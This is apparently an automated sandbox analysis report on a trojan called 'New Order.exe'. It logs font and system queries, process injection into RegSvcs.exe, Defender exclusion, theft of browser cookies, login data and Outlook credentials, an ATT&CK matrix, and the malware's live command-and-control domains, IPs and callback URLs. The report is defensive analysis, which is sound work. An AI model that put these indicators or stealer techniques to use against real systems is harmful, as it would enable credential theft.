                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2432752238.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1679205538.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1677471909.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2433546619.0000000004E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1679654873.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2432752238.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1679205538.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1677471909.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2433546619.0000000004E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1679654873.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                612
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism
                11
                Disable or Modify Tools
                LSASS Memory2
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism
                Cached Domain Credentials113
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1633466 Sample: New Order.exe Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 37 www.79456217.xyz 2->37 39 www.thrivay.website 2->39 41 4 other IPs or domains 2->41 49 Suricata IDS alerts for network traffic 2->49 51 Antivirus / Scanner detection for submitted sample 2->51 53 Multi AV Scanner detection for submitted file 2->53 57 7 other signatures 2->57 10 New Order.exe 4 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 37->55 process4 file5 35 C:\Users\user\AppData\...35ew Order.exe.log, ASCII 10->35 dropped 69 Writes to foreign memory regions 10->69 71 Allocates memory in foreign processes 10->71 73 Adds a directory exclusion to Windows Defender 10->73 75 Injects a PE file into a foreign processes 10->75 14 RegSvcs.exe 10->14         started        17 powershell.exe 23 10->17         started        19 RegSvcs.exe 10->19         started        signatures6 process7 signatures8 77 Maps a DLL or memory area into another process 14->77 21 9WAxm5F77VClmSoGxi.exe 14->21 injected 79 Loading BitLocker PowerShell Module 17->79 24 conhost.exe 17->24         started        process9 signatures10 59 Found direct / indirect Syscall (likely to bypass EDR) 21->59 26 PresentationHost.exe 13 21->26         started        process11 signatures12 61 Tries to steal Mail credentials (via file / registry access) 26->61 63 Tries to harvest and steal browser information (history, passwords, etc) 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 3 other signatures 26->67 29 9WAxm5F77VClmSoGxi.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 www.thrivay.website 203.161.42.73, 49739, 49740, 49741 VNPT-AS-VNVNPTCorpVN Malaysia 29->43 45 sixfiguredigital.group 77.95.113.182, 49729, 80 PROGRESSIVEGB United Kingdom 29->45 47 3 other IPs or domains 29->47 81 Found direct / indirect Syscall (likely to bypass EDR) 29->81 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                New Order.exe55%ReversingLabsWin32.Trojan.Genie8DN
                New Order.exe60%VirustotalBrowse
                New Order.exe100%AviraTR/AD.Nekark.ckhjf
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.thrivay.website/04t4/?ch=z3mRD9CpBO+9TEsCgaevLDuqSAgZSRcKFRU8DceMFbMfFgTaDd0hbIYWywfeaTrgjghZEseGMRK0IE2XxKDTRY48EgRD3PrXiG1CT+NcgLL8qaaAfo2XbfM=&_tlHk=JrClDd5H0%Avira URL Cloudsafe
                http://www.79456217.xyz0%Avira URL Cloudsafe
                http://www.eedpisalgenius.shop/i449/?_tlHk=JrClDd5H&ch=o6aNrPJ8Vgz7qr0n2JZW/7oWDU2mP6EA5dfKdpZrkUJWipFpw/MtjZu4OErTJsSr7rDGASsMPw9ZK2KHHuFx2g8W5ha3Q6M6e22CUDpsBIGP4TNStKDHKyo=0%Avira URL Cloudsafe
                http://www.playav.mobi/d70e/?ch=l5xQA5K4b7aqfogs89hLFhjKsCHXLAQyo6Xr1d/5ybb5OsrKimt0hea7nMwmYGsyz9DiR+F2IdsEY8sqakHWKjkXWyYv+zJPyxGI6Ut+uWbGrsphkgl2JJU=&_tlHk=JrClDd5H0%Avira URL Cloudsafe
                http://www.litespeedtech.com/error-page0%Avira URL Cloudsafe
                http://www.79456217.xyz/q7ap/?ch=2QcLCv3cch7dZL7vkyqSODUavBfutFJT267zkT/xic4HTOjDb+i+cbqxNFfPkyyXEtlXhdON3BxQ/RTEtYdDaTwNr3dR6boWj/YrKQZQXn/ypOqR4YwLt6E=&_tlHk=JrClDd5H0%Avira URL Cloudsafe
                http://www.eedpisalgenius.shop/i449/0%Avira URL Cloudsafe
                http://www.playav.mobi/d70e/0%Avira URL Cloudsafe
                http://www.thrivay.website/04t4/0%Avira URL Cloudsafe
                http://www.79456217.xyz/q7ap/0%Avira URL Cloudsafe
                http://www.sixfiguredigital.group/aoc3/?ch=ENVuXSwqVK4LLJ4bV1ZPNpNHllh6tIMu0UDTRKKNf697foRm0cYEZ1DAoMd0qHiAIGHFieBWVgv/TRDvXeOl/Y7+QOq+siVAyTU6uEP6mIDa1u4fFD7FLl8=&_tlHk=JrClDd5H0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.eedpisalgenius.shop
                104.21.18.45
                truefalse
                  high
                  sixfiguredigital.group
                  77.95.113.182
                  truetrue
                    unknown
                    www.playav.mobi
                    51.222.255.207
                    truefalse
                      high
                      www.79456217.xyz
                      142.0.133.149
                      truefalse
                        high
                        www.thrivay.website
                        203.161.42.73
                        truetrue
                          unknown
                          www.sixfiguredigital.group
                          unknown
                          unknownfalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            http://www.thrivay.website/04t4/?ch=z3mRD9CpBO+9TEsCgaevLDuqSAgZSRcKFRU8DceMFbMfFgTaDd0hbIYWywfeaTrgjghZEseGMRK0IE2XxKDTRY48EgRD3PrXiG1CT+NcgLL8qaaAfo2XbfM=&_tlHk=JrClDd5Htrue
                            • Avira URL Cloud: safe
                            unknown
                            http://www.eedpisalgenius.shop/i449/?_tlHk=JrClDd5H&ch=o6aNrPJ8Vgz7qr0n2JZW/7oWDU2mP6EA5dfKdpZrkUJWipFpw/MtjZu4OErTJsSr7rDGASsMPw9ZK2KHHuFx2g8W5ha3Q6M6e22CUDpsBIGP4TNStKDHKyo=true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.79456217.xyz/q7ap/?ch=2QcLCv3cch7dZL7vkyqSODUavBfutFJT267zkT/xic4HTOjDb+i+cbqxNFfPkyyXEtlXhdON3BxQ/RTEtYdDaTwNr3dR6boWj/YrKQZQXn/ypOqR4YwLt6E=&_tlHk=JrClDd5Htrue
                            • Avira URL Cloud: safe
                            unknown
                            http://www.playav.mobi/d70e/?ch=l5xQA5K4b7aqfogs89hLFhjKsCHXLAQyo6Xr1d/5ybb5OsrKimt0hea7nMwmYGsyz9DiR+F2IdsEY8sqakHWKjkXWyYv+zJPyxGI6Ut+uWbGrsphkgl2JJU=&_tlHk=JrClDd5Htrue
                            • Avira URL Cloud: safe
                            unknown
                            http://www.eedpisalgenius.shop/i449/true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.playav.mobi/d70e/true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.thrivay.website/04t4/true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.79456217.xyz/q7ap/true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.sixfiguredigital.group/aoc3/?ch=ENVuXSwqVK4LLJ4bV1ZPNpNHllh6tIMu0UDTRKKNf697foRm0cYEZ1DAoMd0qHiAIGHFieBWVgv/TRDvXeOl/Y7+QOq+siVAyTU6uEP6mIDa1u4fFD7FLl8=&_tlHk=JrClDd5Htrue
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.comNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designersGNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.79456217.xyz9WAxm5F77VClmSoGxi.exe, 0000000F.00000002.2432752238.000000000068E000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/ac/?q=PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers/?New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/bTheNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/?q=PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designers?New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
